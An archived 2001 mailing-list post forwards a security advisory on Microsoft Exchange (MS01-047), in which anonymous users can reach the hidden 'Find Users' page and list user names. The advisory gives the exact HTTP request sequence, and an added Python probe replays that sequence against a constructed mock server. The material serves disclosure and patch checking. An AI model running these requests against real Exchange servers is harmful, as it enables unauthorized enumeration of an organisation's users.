Fw: Exchange Public Folders Information Leakage

From: Felix Huber (huberfelixat_private)
Date: Fri Sep 07 2001 - 15:55:08 PDT


    ----- Original Message -----
    From: "Aviram Jenik" <aviramat_private>
    To: <NTBUGTRAQat_private>
    Sent: Friday, September 07, 2001 11:51 AM
    Subject: Exchange Public Folders Information Leakage
    
    
    > The following security advisory is sent to the securiteam mailing list, and
    > can be found at the SecuriTeam web site: http://www.securiteam.com
    >
    > SUMMARY
    >
    > Microsoft Exchange Server handles anonymous access to its Public Folders
    > insecurely. While administrators may disable the "Find Users" feature to
    > prevent anonymous users from enumerating existing user names, a security
    > flaw in Exchange server allows remote attackers with access to the
    > Exchange server to run "Find Users".
    >
    > DETAILS
    >
    > The "Find Users" option of Microsoft Exchange's Public Folders can be
    > disabled. This, however, does not prevent users from directly accessing
    > the ASP page (fumsg.asp). The link to "Find Users" is hidden; however,
    > it is still possible to access the page programmatically.
    >
    > Steps to recreate:
    > 1) Contact:
    > GET /exchange/root.asp?acs=anon HTTP/1.1
    > Host: www.example.com
    >
    > 2) Access the redirected page, and resend the issued cookie.
    > GET /exchange/logonfrm.asp HTTP/1.1
    > Host: www.example.com
    > Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN
    >
    > 3) Access the redirected page, and resend the issued cookie.
    > GET /exchange/root.asp?acs=anon HTTP/1.1
    > Host: www.example.com
    > Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN
    >
    > 4) Issue this request to obtain a list of users with the letter 'a' in
    > their name (e.g. Administrator):
    > POST /exchange/finduser/fumsg.asp HTTP/1.1
    > Host: www.example.com
    > Accept: */*
    > Content-Type: application/x-www-form-urlencoded
    > Content-Length: 44
    > Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN
    >
    > DN=a&FN=&LN=&TL=&AN=&CP=&DP=&OF=&CY=&ST=&CO=
    >
    > Vendor status:
    > Microsoft was contacted on August 4, 2001. A security bulletin was
    > released on September 7, 2001.
    >
    > Solution:
    > Microsoft has released a patch for this problem. See Microsoft Security
    > Bulletin MS01-047 for more information:
    > <http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-047.asp>
    >
    >
    > ADDITIONAL INFORMATION
    > This security hole was discovered by Noam Rathaus <mailto:noamrat_private>.
    > The information has been provided by SecuriTeam Experts
    > <mailto:expertsat_private>.
    >
    >
    >
    > ====================
    > ====================
    >
    > DISCLAIMER:
    > The information in this bulletin is provided "AS IS" without warranty of
    > any kind. In no event shall we be liable for any damages whatsoever,
    > including direct, indirect, incidental, consequential, loss of business
    > profits or special damages.
    >
    
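The four-step exchange from the forwarded advisory, as an added example that is not part of the original message or of SecuriTeam's advisory: a Python probe that replays the same request sequence against a host and reports whether fumsg.asp answered the anonymous session. So that it runs offline, a constructed mock server stands in for the Exchange host. The session cookie value is the one quoted in the advisory; the mock's directory, its plain-text reply and the `find_users_enabled` switch (which models a server that refuses the direct POST) are invented and are not real Exchange behaviour. Only the request sequence is taken from the advisory; the probe does not follow the Location redirect, it sends the fixed steps as listed.

```python
import http.client
import threading
from http.cookies import SimpleCookie
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs

ANON_ROOT = "/exchange/root.asp?acs=anon"
LOGON_PATH = "/exchange/logonfrm.asp"
FIND_USER_PATH = "/exchange/finduser/fumsg.asp"

def _session_cookie(resp):
    """Return 'NAME=VALUE' of the ASPSESSIONID* cookie issued in resp, or None."""
    for raw in resp.msg.get_all("Set-Cookie") or []:
        for name, morsel in SimpleCookie(raw).items():
            if name.startswith("ASPSESSIONID"):
                return f"{name}={morsel.value}"
    return None

def probe(host, port=80, letter="a"):
    """Send steps 1-4 from the advisory; find_users_reachable is True only when
    the direct POST on an anonymous session came back 200 with a body."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    headers = {"Host": host}
    # Step 1: the anonymous entry point hands out an ASP session cookie.
    conn.request("GET", ANON_ROOT, headers=headers)
    resp = conn.getresponse()
    resp.read()
    cookie = _session_cookie(resp)
    if cookie is None:
        conn.close()
        return {"session_cookie": None, "status": resp.status,
                "find_users_reachable": False, "body": ""}
    headers["Cookie"] = cookie
    # Steps 2 and 3: logon form, then root.asp again, resending the cookie.
    for path in (LOGON_PATH, ANON_ROOT):
        conn.request("GET", path, headers=headers)
        conn.getresponse().read()
    # Step 4: POST the hidden search form straight to fumsg.asp; DN=<letter>
    # matches every display name containing that letter (http.client adds Content-Length).
    form = f"DN={letter}&FN=&LN=&TL=&AN=&CP=&DP=&OF=&CY=&ST=&CO="
    headers.update({"Accept": "*/*",
                    "Content-Type": "application/x-www-form-urlencoded"})
    conn.request("POST", FIND_USER_PATH, body=form, headers=headers)
    resp = conn.getresponse()
    body = resp.read().decode("latin-1", "replace")
    conn.close()
    return {"session_cookie": cookie, "status": resp.status,
            "find_users_reachable": resp.status == 200 and bool(body.strip()),
            "body": body}

class _ExchangeMock(BaseHTTPRequestHandler):
    """Constructed stand-in for the server so the probe runs offline. The cookie is
    the value quoted in the advisory; directory, reply format and the
    find_users_enabled switch are invented, not Exchange behaviour."""
    SESSION = "ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN"
    DIRECTORY = ("Administrator", "Guest", "jsmith")
    find_users_enabled = True  # False models a server that refuses the direct POST

    def log_message(self, *_):
        pass  # keep the run quiet

    def _reply(self, code, body, extra=()):
        self.send_response(code)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        for name, value in extra:
            self.send_header(name, value)
        self.end_headers()
        self.wfile.write(body)

    def do_GET(self):
        if self.path == ANON_ROOT:  # steps 1 and 3: issue the session, bounce to logon
            self._reply(302, b"", [("Set-Cookie", self.SESSION + "; path=/"),
                                   ("Location", LOGON_PATH)])
        else:
            self._reply(200, b"logon form without a Find Users link\n")

    def do_POST(self):
        form = parse_qs(self.rfile.read(int(self.headers.get("Content-Length", 0))).decode("latin-1"))
        on_anon_session = self.headers.get("Cookie") == self.SESSION
        if self.path != FIND_USER_PATH or not on_anon_session or not self.find_users_enabled:
            self._reply(403, b"")
            return
        needle = form.get("DN", [""])[0].lower()
        hits = [n for n in self.DIRECTORY if needle in n.lower()]
        self._reply(200, ("\n".join(hits) + "\n").encode())

def start_mock(find_users_enabled=True):
    """Start the mock on an ephemeral loopback port; the caller calls .shutdown()."""
    handler = type("Mock", (_ExchangeMock,), {"find_users_enabled": find_users_enabled})
    srv = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv

if __name__ == "__main__":
    srv = start_mock()
    print(probe("127.0.0.1", srv.server_port))  # against the mock, not a live host
    srv.shutdown()
```

Pointed at a lab host instead of the mock, a 200 with a non-empty body from fumsg.asp on a session that was never authenticated means the hidden page is still reachable directly and the MS01-047 patch should be confirmed; a 403 or a redirect back to the logon form is what the probe treats as closed. Real Exchange output will not look like the mock's one-name-per-line reply, so inspect the body rather than relying on the mock's format.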



    This archive was generated by hypermail 2b30 : Fri Sep 07 2001 - 15:55:28 PDT